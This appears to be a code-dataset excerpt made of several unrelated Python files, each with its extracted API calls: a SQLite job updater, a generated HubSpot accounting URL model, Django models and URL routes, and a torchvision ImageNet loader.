split[0], "pipeline/deplatformr_open_images_workflow.sqlite")
workflow_db = sqlite3.connect(workflow_db_path)
cursor = workflow_db.cursor()
utctime = datetime.utcnow()
with open("updated_jobs.txt", "r") as jobs_list:
jobs = jobs_list.readlines()
for job in jobs:
split = job.split(",")
cursor.execute("UPDATE jobs set job_id=?, timestamp=?, status=? WHERE cid=?",
(split[1], utctime, "JOB_STATUS_EXECUTING", split[0],),)
workflow_db.commit()
workflow_db.close()
|
[
"os.getcwd",
"datetime.datetime.utcnow",
"sqlite3.connect",
"os.path.split",
"os.path.join"
] |
[((68, 79), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (77, 79), False, 'import os\n'), ((88, 111), 'os.path.split', 'os.path.split', (['abs_path'], {}), '(abs_path)\n', (101, 111), False, 'import os\n'), ((132, 206), 'os.path.join', 'os.path.join', (['split[0]', '"""pipeline/deplatformr_open_images_workflow.sqlite"""'], {}), "(split[0], 'pipeline/deplatformr_open_images_workflow.sqlite')\n", (144, 206), False, 'import os\n'), ((227, 260), 'sqlite3.connect', 'sqlite3.connect', (['workflow_db_path'], {}), '(workflow_db_path)\n', (242, 260), False, 'import sqlite3\n'), ((302, 319), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (317, 319), False, 'from datetime import datetime\n')]
|
# coding: utf-8
"""
Accounting Extension
These APIs allow you to interact with HubSpot's Accounting Extension. It allows you to: * Specify the URLs that HubSpot will use when making webhook requests to your external accounting system. * Respond to webhook calls made to your external accounting system by HubSpot # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.crm.extensions.accounting.configuration import Configuration
class AccountingAppUrls(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'get_invoice_url': 'str',
'search_customer_url': 'str',
'get_invoice_pdf_url': 'str',
'customer_url_template': 'str',
'product_url_template': 'str',
'invoice_url_template': 'str',
'create_invoice_url': 'str',
'search_invoice_url': 'str',
'search_product_url': 'str',
'get_terms_url': 'str',
'create_customer_url': 'str',
'search_tax_url': 'str',
'exchange_rate_url': 'str',
'search_url': 'str',
'search_count_url': 'str'
}
attribute_map = {
'get_invoice_url': 'getInvoiceUrl',
'search_customer_url': 'searchCustomerUrl',
'get_invoice_pdf_url': 'getInvoicePdfUrl',
'customer_url_template': 'customerUrlTemplate',
'product_url_template': 'productUrlTemplate',
'invoice_url_template': 'invoiceUrlTemplate',
'create_invoice_url': 'createInvoiceUrl',
'search_invoice_url': 'searchInvoiceUrl',
'search_product_url': 'searchProductUrl',
'get_terms_url': 'getTermsUrl',
'create_customer_url': 'createCustomerUrl',
'search_tax_url': 'searchTaxUrl',
'exchange_rate_url': 'exchangeRateUrl',
'search_url': 'searchUrl',
'search_count_url': 'searchCountUrl'
}
def __init__(self, get_invoice_url=None, search_customer_url=None, get_invoice_pdf_url=None, customer_url_template=None, product_url_template=None, invoice_url_template=None, create_invoice_url=None, search_invoice_url=None, search_product_url=None, get_terms_url=None, create_customer_url=None, search_tax_url=None, exchange_rate_url=None, search_url=None, search_count_url=None, local_vars_configuration=None): # noqa: E501
"""AccountingAppUrls - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._get_invoice_url = None
self._search_customer_url = None
self._get_invoice_pdf_url = None
self._customer_url_template = None
self._product_url_template = None
self._invoice_url_template = None
self._create_invoice_url = None
self._search_invoice_url = None
self._search_product_url = None
self._get_terms_url = None
self._create_customer_url = None
self._search_tax_url = None
self._exchange_rate_url = None
self._search_url = None
self._search_count_url = None
self.discriminator = None
self.get_invoice_url = get_invoice_url
self.search_customer_url = search_customer_url
self.get_invoice_pdf_url = get_invoice_pdf_url
self.customer_url_template = customer_url_template
self.product_url_template = product_url_template
self.invoice_url_template = invoice_url_template
if create_invoice_url is not None:
self.create_invoice_url = create_invoice_url
if search_invoice_url is not None:
self.search_invoice_url = search_invoice_url
if search_product_url is not None:
self.search_product_url = search_product_url
if get_terms_url is not None:
self.get_terms_url = get_terms_url
if create_customer_url is not None:
self.create_customer_url = create_customer_url
if search_tax_url is not None:
self.search_tax_url = search_tax_url
if exchange_rate_url is not None:
self.exchange_rate_url = exchange_rate_url
if search_url is not None:
self.search_url = search_url
if search_count_url is not None:
self.search_count_url = search_count_url
@property
def get_invoice_url(self):
"""Gets the get_invoice_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where invoices can be retrieved. # noqa: E501
:return: The get_invoice_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._get_invoice_url
@get_invoice_url.setter
def get_invoice_url(self, get_invoice_url):
"""Sets the get_invoice_url of this AccountingAppUrls.
A URL that specifies the endpoint where invoices can be retrieved. # noqa: E501
:param get_invoice_url: The get_invoice_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and get_invoice_url is None: # noqa: E501
raise ValueError("Invalid value for `get_invoice_url`, must not be `None`") # noqa: E501
self._get_invoice_url = get_invoice_url
@property
def search_customer_url(self):
"""Gets the search_customer_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a customer search can be performed. # noqa: E501
:return: The search_customer_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_customer_url
@search_customer_url.setter
def search_customer_url(self, search_customer_url):
"""Sets the search_customer_url of this AccountingAppUrls.
A URL that specifies the endpoint where a customer search can be performed. # noqa: E501
:param search_customer_url: The search_customer_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and search_customer_url is None: # noqa: E501
raise ValueError("Invalid value for `search_customer_url`, must not be `None`") # noqa: E501
self._search_customer_url = search_customer_url
@property
def get_invoice_pdf_url(self):
"""Gets the get_invoice_pdf_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where an invoice PDF can be retrieved. # noqa: E501
:return: The get_invoice_pdf_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._get_invoice_pdf_url
@get_invoice_pdf_url.setter
def get_invoice_pdf_url(self, get_invoice_pdf_url):
"""Sets the get_invoice_pdf_url of this AccountingAppUrls.
A URL that specifies the endpoint where an invoice PDF can be retrieved. # noqa: E501
:param get_invoice_pdf_url: The get_invoice_pdf_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and get_invoice_pdf_url is None: # noqa: E501
raise ValueError("Invalid value for `get_invoice_pdf_url`, must not be `None`") # noqa: E501
self._get_invoice_pdf_url = get_invoice_pdf_url
@property
def customer_url_template(self):
"""Gets the customer_url_template of this AccountingAppUrls. # noqa: E501
A template URL that indicates the endpoint where a customer can be fetched by ID. Note that ${CUSTOMER_ID} in this URL will be replaced by the actual customer ID. For example: https://myapp.com/api/customers/${CUSTOMER_ID} # noqa: E501
:return: The customer_url_template of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._customer_url_template
@customer_url_template.setter
def customer_url_template(self, customer_url_template):
"""Sets the customer_url_template of this AccountingAppUrls.
A template URL that indicates the endpoint where a customer can be fetched by ID. Note that ${CUSTOMER_ID} in this URL will be replaced by the actual customer ID. For example: https://myapp.com/api/customers/${CUSTOMER_ID} # noqa: E501
:param customer_url_template: The customer_url_template of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and customer_url_template is None: # noqa: E501
raise ValueError("Invalid value for `customer_url_template`, must not be `None`") # noqa: E501
self._customer_url_template = customer_url_template
@property
def product_url_template(self):
"""Gets the product_url_template of this AccountingAppUrls. # noqa: E501
A template URL that indicates the endpoint where a product can be fetched by ID. Note that ${PRODUCT_ID} in this URL will be replaced by the actual product ID. For example: https://myapp.com/api/products/${PRODUCT_ID} # noqa: E501
:return: The product_url_template of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._product_url_template
@product_url_template.setter
def product_url_template(self, product_url_template):
"""Sets the product_url_template of this AccountingAppUrls.
A template URL that indicates the endpoint where a product can be fetched by ID. Note that ${PRODUCT_ID} in this URL will be replaced by the actual product ID. For example: https://myapp.com/api/products/${PRODUCT_ID} # noqa: E501
:param product_url_template: The product_url_template of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and product_url_template is None: # noqa: E501
raise ValueError("Invalid value for `product_url_template`, must not be `None`") # noqa: E501
self._product_url_template = product_url_template
@property
def invoice_url_template(self):
"""Gets the invoice_url_template of this AccountingAppUrls. # noqa: E501
A template URL that indicates the endpoint where an invoice can be fetched by ID. Note that ${INVOICE_ID} in this URL will be replaced by the actual invoice ID. For example: https://myapp.com/api/invoices/${INVOICE_ID} # noqa: E501
:return: The invoice_url_template of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._invoice_url_template
@invoice_url_template.setter
def invoice_url_template(self, invoice_url_template):
"""Sets the invoice_url_template of this AccountingAppUrls.
A template URL that indicates the endpoint where an invoice can be fetched by ID. Note that ${INVOICE_ID} in this URL will be replaced by the actual invoice ID. For example: https://myapp.com/api/invoices/${INVOICE_ID} # noqa: E501
:param invoice_url_template: The invoice_url_template of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and invoice_url_template is None: # noqa: E501
raise ValueError("Invalid value for `invoice_url_template`, must not be `None`") # noqa: E501
self._invoice_url_template = invoice_url_template
@property
def create_invoice_url(self):
"""Gets the create_invoice_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where an invoices can be created. # noqa: E501
:return: The create_invoice_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._create_invoice_url
@create_invoice_url.setter
def create_invoice_url(self, create_invoice_url):
"""Sets the create_invoice_url of this AccountingAppUrls.
A URL that specifies the endpoint where an invoices can be created. # noqa: E501
:param create_invoice_url: The create_invoice_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._create_invoice_url = create_invoice_url
@property
def search_invoice_url(self):
"""Gets the search_invoice_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where an invoice search can be performed. # noqa: E501
:return: The search_invoice_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_invoice_url
@search_invoice_url.setter
def search_invoice_url(self, search_invoice_url):
"""Sets the search_invoice_url of this AccountingAppUrls.
A URL that specifies the endpoint where an invoice search can be performed. # noqa: E501
:param search_invoice_url: The search_invoice_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_invoice_url = search_invoice_url
@property
def search_product_url(self):
"""Gets the search_product_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a product search can be performed. # noqa: E501
:return: The search_product_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_product_url
@search_product_url.setter
def search_product_url(self, search_product_url):
"""Sets the search_product_url of this AccountingAppUrls.
A URL that specifies the endpoint where a product search can be performed. # noqa: E501
:param search_product_url: The search_product_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_product_url = search_product_url
@property
def get_terms_url(self):
"""Gets the get_terms_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where payment terms can be retrieved. # noqa: E501
:return: The get_terms_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._get_terms_url
@get_terms_url.setter
def get_terms_url(self, get_terms_url):
"""Sets the get_terms_url of this AccountingAppUrls.
A URL that specifies the endpoint where payment terms can be retrieved. # noqa: E501
:param get_terms_url: The get_terms_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._get_terms_url = get_terms_url
@property
def create_customer_url(self):
"""Gets the create_customer_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a new customer can be created. # noqa: E501
:return: The create_customer_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._create_customer_url
@create_customer_url.setter
def create_customer_url(self, create_customer_url):
"""Sets the create_customer_url of this AccountingAppUrls.
A URL that specifies the endpoint where a new customer can be created. # noqa: E501
:param create_customer_url: The create_customer_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._create_customer_url = create_customer_url
@property
def search_tax_url(self):
"""Gets the search_tax_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a tax search can be performed. # noqa: E501
:return: The search_tax_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_tax_url
@search_tax_url.setter
def search_tax_url(self, search_tax_url):
"""Sets the search_tax_url of this AccountingAppUrls.
A URL that specifies the endpoint where a tax search can be performed. # noqa: E501
:param search_tax_url: The search_tax_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_tax_url = search_tax_url
@property
def exchange_rate_url(self):
"""Gets the exchange_rate_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where exchange rates can be queried. # noqa: E501
:return: The exchange_rate_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._exchange_rate_url
@exchange_rate_url.setter
def exchange_rate_url(self, exchange_rate_url):
"""Sets the exchange_rate_url of this AccountingAppUrls.
A URL that specifies the endpoint where exchange rates can be queried. # noqa: E501
:param exchange_rate_url: The exchange_rate_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._exchange_rate_url = exchange_rate_url
@property
def search_url(self):
"""Gets the search_url of this AccountingAppUrls. # noqa: E501
:return: The search_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_url
@search_url.setter
def search_url(self, search_url):
"""Sets the search_url of this AccountingAppUrls.
:param search_url: The search_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_url = search_url
@property
def search_count_url(self):
"""Gets the search_count_url of this AccountingAppUrls. # noqa: E501
:return: The search_count_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_count_url
@search_count_url.setter
def search_count_url(self, search_count_url):
"""Sets the search_count_url of this AccountingAppUrls.
:param search_count_url: The search_count_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_count_url = search_count_url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AccountingAppUrls):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, AccountingAppUrls):
return True
return self.to_dict() != other.to_dict()
|
[
"six.iteritems",
"hubspot.crm.extensions.accounting.configuration.Configuration"
] |
[((18751, 18784), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (18764, 18784), False, 'import six\n'), ((2930, 2945), 'hubspot.crm.extensions.accounting.configuration.Configuration', 'Configuration', ([], {}), '()\n', (2943, 2945), False, 'from hubspot.crm.extensions.accounting.configuration import Configuration\n')]
|
from __future__ import unicode_literals
from mezzanine.core import fields
from mezzanine.pages.models import Page
from django.db import models
DATASET_TYPES = [
('Voters', 'Voters'),
('Candidates', 'Candidates'),
('Political Parties', 'Political Parties'),
('Federal', 'Federal'),
('Results', 'Results'),
('Others', 'Others'),
]
DISTRICT = [
('Achham ', 'Achham'),
('Arghakhanchi', 'Arghakhanchi'),
('Baglung', 'Baglung'),
('Baitadi', 'Baitadi'),
('Bajhang', 'Bajhang'),
('Bajura', 'Bajura'),
('Banke', 'Banke'),
('Bara', 'Bara'),
('Bardiya', 'Bardiya'),
('Bhaktapur', 'Bhaktapur'),
('Bhojpur', 'Bhojpur'),
('Chitwan', 'Chitwan'),
('Dadeldhura', 'Dadeldhura'),
('Dailekh', 'Dailekh'),
('Dang', 'Dang'),
('Darchula', 'Darchula'),
('Dhading', 'Dhading'),
('Dhankuta', 'Dhankuta'),
('Dhanusa', 'Dhanusa'),
('Dolakha', 'Dolakha'),
('Dolpa', 'Dolpa'),
('Doti', 'Doti'),
('Gorkha', 'Gorkha'),
('Gulmi', 'Gulmi'),
('Humla', 'Humla'),
('Ilam', 'Ilam'),
('Jajarkot', 'Jajarkot'),
('Jhapa', 'Jhapa'),
('Jumla', 'Jumla'),
('Kailali', 'Kailali'),
('Kalikot', 'Kalikot'),
('Kanchanpur', 'Kanchanpur'),
('Kapilbastu', 'Kapilbastu'),
('Kaski', 'Kaski'),
('Kathmandu', 'Kathmandu'),
('Kavrepalanchok', 'Kavrepalanchok'),
('Khotang', 'Khotang'),
('Lalitpur', 'Lalitpur'),
('Lamjung', 'Lamjung'),
('Mahottari', 'Mahottari'),
('Makwanpur', 'Makwanpur'),
('Manang', 'Manang'),
('Morang', 'Morang'),
('Mugu', 'Mugu'),
('Mustang', 'Mustang'),
('Myagdi', 'Myagdi'),
('Nawalparasi', 'Nawalparasi'),
('Nuwakot', 'Nuwakot'),
('Okhaldhunga', 'Okhaldhunga'),
('Palpa', 'Palpa'),
('Panchthar', 'Panchthar'),
('Parbat', 'Parbat'),
('Parsa', 'Parsa'),
('Pyuthan', 'Pyuthan'),
('Ramechhap', 'Ramechhap'),
('Rasuwa', 'Rasuwa'),
('Rautahat', 'Rautahat'),
('Rolpa', 'Rolpa'),
('Rukum', 'Rukum'),
('Rupandehi', 'Rupandehi'),
('Salyan', 'Salyan'),
('Sankhuwasabha', 'Sankhuwasabha'),
('Saptari', 'Saptari'),
('Sarlahi', 'Sarlahi'),
('Sindhuli', 'Sindhuli'),
('Sindhupalchok', 'Sindhupalchok'),
('Siraha', 'Siraha'),
('Solukhumbu', 'Solukhumbu'),
('Sunsari', 'Sunsari'),
('Surkhet', 'Surkhet'),
('Syangja', 'Syangja'),
('Tanahu', 'Tanahu'),
('Taplejung', 'Taplejung'),
('Terhathum', 'Terhathum'),
('Udayapur', 'Udayapur'),
]
PROVINCE_NO = [ (1, 1),(2, 2),(3, 3),(4, 4),(5, 5),(6, 6),(7, 7)]
# Create your models here.
class SiteInformation(models.Model):
Logo=fields.FileField("Logo", format="Image")
Site_Title = models.CharField(max_length=100, null=False, blank=False)
Site_Meta_Key = models.CharField(max_length=160, null=False, blank=False)
Site_Meta_Description = models.TextField(max_length=160, null=False, blank=False)
Footer_Logo=fields.FileField("Footer Logo", format="Image")
def __str__(self):
return "Edit Here"
def __unicode__(self):
return "Edit Here"
class Meta:
verbose_name_plural = 'Site Information'
class AboutUs(models.Model):
Content=fields.RichTextField(null=True, blank=True)
def __str__(self):
return "About Us"
def __unicode__(self):
return "About Us"
class Meta:
verbose_name_plural = 'About Us'
class Data_template(Page):
pass
def __str__(self):
return "Projects"
class Meta:
verbose_name = 'Data'
verbose_name_plural = 'Dataset'
class Data(models.Model):
Data_Title = models.CharField(max_length=100, null=False, blank=False)
GitHub_Link = models.URLField()
added = models.DateTimeField(auto_now_add=True)
type=models.CharField(max_length=100, null=True, blank=True, choices=DATASET_TYPES)
district=models.CharField(max_length=100, null=True, blank=True,choices=DISTRICT)
province=models.IntegerField(null=True, blank=True,choices=PROVINCE_NO)
def __str__(self):
return self.Data_Title
def __unicode__(self):
return self.Data_Title
class Visualization_template(Page):
pass
def __str__(self):
return "Visualization"
class Meta:
verbose_name = 'Visualizations'
verbose_name_plural = 'Visualization'
class Visualization(models.Model):
Data_Title = models.CharField(max_length=100, null=False, blank=False)
Inforgraphic =fields.FileField("Viusalization Image", format="Image")
GitHub_Link = models.URLField(null=True, blank=True)
added = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True,)
def __str__(self):
return self.Data_Title
def __unicode__(self):
return self.Data_Title
|
[
"django.db.models.TextField",
"django.db.models.URLField",
"django.db.models.CharField",
"django.db.models.IntegerField",
"mezzanine.core.fields.FileField",
"django.db.models.DateTimeField",
"mezzanine.core.fields.RichTextField"
] |
[((2657, 2697), 'mezzanine.core.fields.FileField', 'fields.FileField', (['"""Logo"""'], {'format': '"""Image"""'}), "('Logo', format='Image')\n", (2673, 2697), False, 'from mezzanine.core import fields\n'), ((2716, 2773), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(False)', 'blank': '(False)'}), '(max_length=100, null=False, blank=False)\n', (2732, 2773), False, 'from django.db import models\n'), ((2794, 2851), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(160)', 'null': '(False)', 'blank': '(False)'}), '(max_length=160, null=False, blank=False)\n', (2810, 2851), False, 'from django.db import models\n'), ((2880, 2937), 'django.db.models.TextField', 'models.TextField', ([], {'max_length': '(160)', 'null': '(False)', 'blank': '(False)'}), '(max_length=160, null=False, blank=False)\n', (2896, 2937), False, 'from django.db import models\n'), ((2954, 3001), 'mezzanine.core.fields.FileField', 'fields.FileField', (['"""Footer Logo"""'], {'format': '"""Image"""'}), "('Footer Logo', format='Image')\n", (2970, 3001), False, 'from mezzanine.core import fields\n'), ((3217, 3260), 'mezzanine.core.fields.RichTextField', 'fields.RichTextField', ([], {'null': '(True)', 'blank': '(True)'}), '(null=True, blank=True)\n', (3237, 3260), False, 'from mezzanine.core import fields\n'), ((3643, 3700), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(False)', 'blank': '(False)'}), '(max_length=100, null=False, blank=False)\n', (3659, 3700), False, 'from django.db import models\n'), ((3719, 3736), 'django.db.models.URLField', 'models.URLField', ([], {}), '()\n', (3734, 3736), False, 'from django.db import models\n'), ((3749, 3788), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (3769, 3788), False, 'from django.db import models\n'), ((3798, 3876), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'choices': 'DATASET_TYPES'}), '(max_length=100, null=True, blank=True, choices=DATASET_TYPES)\n', (3814, 3876), False, 'from django.db import models\n'), ((3890, 3963), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'choices': 'DISTRICT'}), '(max_length=100, null=True, blank=True, choices=DISTRICT)\n', (3906, 3963), False, 'from django.db import models\n'), ((3976, 4039), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)', 'blank': '(True)', 'choices': 'PROVINCE_NO'}), '(null=True, blank=True, choices=PROVINCE_NO)\n', (3995, 4039), False, 'from django.db import models\n'), ((4415, 4472), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(False)', 'blank': '(False)'}), '(max_length=100, null=False, blank=False)\n', (4431, 4472), False, 'from django.db import models\n'), ((4491, 4546), 'mezzanine.core.fields.FileField', 'fields.FileField', (['"""Viusalization Image"""'], {'format': '"""Image"""'}), "('Viusalization Image', format='Image')\n", (4507, 4546), False, 'from mezzanine.core import fields\n'), ((4566, 4604), 'django.db.models.URLField', 'models.URLField', ([], {'null': '(True)', 'blank': '(True)'}), '(null=True, blank=True)\n', (4581, 4604), False, 'from django.db import models\n'), ((4617, 4656), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (4637, 4656), False, 'from django.db import models\n'), ((4671, 4706), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (4691, 4706), False, 'from django.db import models\n')]
|
from django.conf.urls import include, url
from django.contrib import admin
from django.shortcuts import render
from authlib import views
from authlib.facebook import FacebookOAuth2Client
from authlib.google import GoogleOAuth2Client
from authlib.twitter import TwitterOAuthClient
from testapp.views import custom_verification, custom_verification_code
urlpatterns = [
url(r"", include("authlib.admin_oauth.urls")),
url(r"^admin/", admin.site.urls),
url(r"^404/$", lambda request: render(request, "404.html")),
url(r"^login/$", views.login, name="login"),
url(
r"^oauth/facebook/$",
views.oauth2,
{"client_class": FacebookOAuth2Client},
name="accounts_oauth_facebook",
),
url(
r"^oauth/google/$",
views.oauth2,
{"client_class": GoogleOAuth2Client},
name="accounts_oauth_google",
),
url(
r"^oauth/twitter/$",
views.oauth2,
{"client_class": TwitterOAuthClient},
name="accounts_oauth_twitter",
),
url(r"^email/$", views.email_registration, name="email_registration"),
url(
r"^email/(?P<code>[^/]+)/$",
views.email_registration,
name="email_registration_confirm",
),
url(r"^logout/$", views.logout, name="logout"),
url(r"^custom/$", custom_verification),
url(
r"^custom/(?P<code>[^/]+)/$",
custom_verification_code,
name="custom_verification_code",
),
]
|
[
"django.shortcuts.render",
"django.conf.urls.include",
"django.conf.urls.url"
] |
[((427, 458), 'django.conf.urls.url', 'url', (['"""^admin/"""', 'admin.site.urls'], {}), "('^admin/', admin.site.urls)\n", (430, 458), False, 'from django.conf.urls import include, url\n'), ((530, 572), 'django.conf.urls.url', 'url', (['"""^login/$"""', 'views.login'], {'name': '"""login"""'}), "('^login/$', views.login, name='login')\n", (533, 572), False, 'from django.conf.urls import include, url\n'), ((579, 693), 'django.conf.urls.url', 'url', (['"""^oauth/facebook/$"""', 'views.oauth2', "{'client_class': FacebookOAuth2Client}"], {'name': '"""accounts_oauth_facebook"""'}), "('^oauth/facebook/$', views.oauth2, {'client_class':\n FacebookOAuth2Client}, name='accounts_oauth_facebook')\n", (582, 693), False, 'from django.conf.urls import include, url\n'), ((735, 843), 'django.conf.urls.url', 'url', (['"""^oauth/google/$"""', 'views.oauth2', "{'client_class': GoogleOAuth2Client}"], {'name': '"""accounts_oauth_google"""'}), "('^oauth/google/$', views.oauth2, {'client_class': GoogleOAuth2Client},\n name='accounts_oauth_google')\n", (738, 843), False, 'from django.conf.urls import include, url\n'), ((885, 995), 'django.conf.urls.url', 'url', (['"""^oauth/twitter/$"""', 'views.oauth2', "{'client_class': TwitterOAuthClient}"], {'name': '"""accounts_oauth_twitter"""'}), "('^oauth/twitter/$', views.oauth2, {'client_class': TwitterOAuthClient},\n name='accounts_oauth_twitter')\n", (888, 995), False, 'from django.conf.urls import include, url\n'), ((1037, 1105), 'django.conf.urls.url', 'url', (['"""^email/$"""', 'views.email_registration'], {'name': '"""email_registration"""'}), "('^email/$', views.email_registration, name='email_registration')\n", (1040, 1105), False, 'from django.conf.urls import include, url\n'), ((1112, 1209), 'django.conf.urls.url', 'url', (['"""^email/(?P<code>[^/]+)/$"""', 'views.email_registration'], {'name': '"""email_registration_confirm"""'}), "('^email/(?P<code>[^/]+)/$', views.email_registration, name=\n 'email_registration_confirm')\n", (1115, 1209), False, 'from django.conf.urls import include, url\n'), ((1242, 1287), 'django.conf.urls.url', 'url', (['"""^logout/$"""', 'views.logout'], {'name': '"""logout"""'}), "('^logout/$', views.logout, name='logout')\n", (1245, 1287), False, 'from django.conf.urls import include, url\n'), ((1294, 1331), 'django.conf.urls.url', 'url', (['"""^custom/$"""', 'custom_verification'], {}), "('^custom/$', custom_verification)\n", (1297, 1331), False, 'from django.conf.urls import include, url\n'), ((1338, 1434), 'django.conf.urls.url', 'url', (['"""^custom/(?P<code>[^/]+)/$"""', 'custom_verification_code'], {'name': '"""custom_verification_code"""'}), "('^custom/(?P<code>[^/]+)/$', custom_verification_code, name=\n 'custom_verification_code')\n", (1341, 1434), False, 'from django.conf.urls import include, url\n'), ((385, 420), 'django.conf.urls.include', 'include', (['"""authlib.admin_oauth.urls"""'], {}), "('authlib.admin_oauth.urls')\n", (392, 420), False, 'from django.conf.urls import include, url\n'), ((496, 523), 'django.shortcuts.render', 'render', (['request', '"""404.html"""'], {}), "(request, '404.html')\n", (502, 523), False, 'from django.shortcuts import render\n')]
|
from torchvision.datasets.vision import VisionDataset
import os
import pickle
from torchvision.datasets.folder import default_loader
class Imagenet(VisionDataset):
def __init__(self, root, data_list, train=True, transform=None, target_transform=None, img_dir='all', target_dir='annos'):
super(Imagenet, self).__init__(root, transform=transform,
target_transform=target_transform)
self.data = []
self.targets = []
self.train = train
self.data_list = os.path.join(root, data_list)
self.img_dir_path = os.path.join(root, img_dir)
self.target_dir_path = os.path.join(root, target_dir)
self.transform = transform
self.target_transform = target_transform
if (os.path.isfile(self.data_list)):
with open(self.data_list, 'r') as infile:
for line in infile:
img_name, label = line.strip().split(' ')
self.data.append(os.path.join(self.img_dir_path, img_name))
self.targets.append(int(label) - 1)
else:
print('data list is not file')
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img_path, target = self.data[index], self.targets[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = default_loader(img_path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
def extra_repr(self):
return "Split: {}".format("Train" if self.train is True else "Test")
|
[
"torchvision.datasets.folder.default_loader",
"os.path.isfile",
"os.path.join"
] |
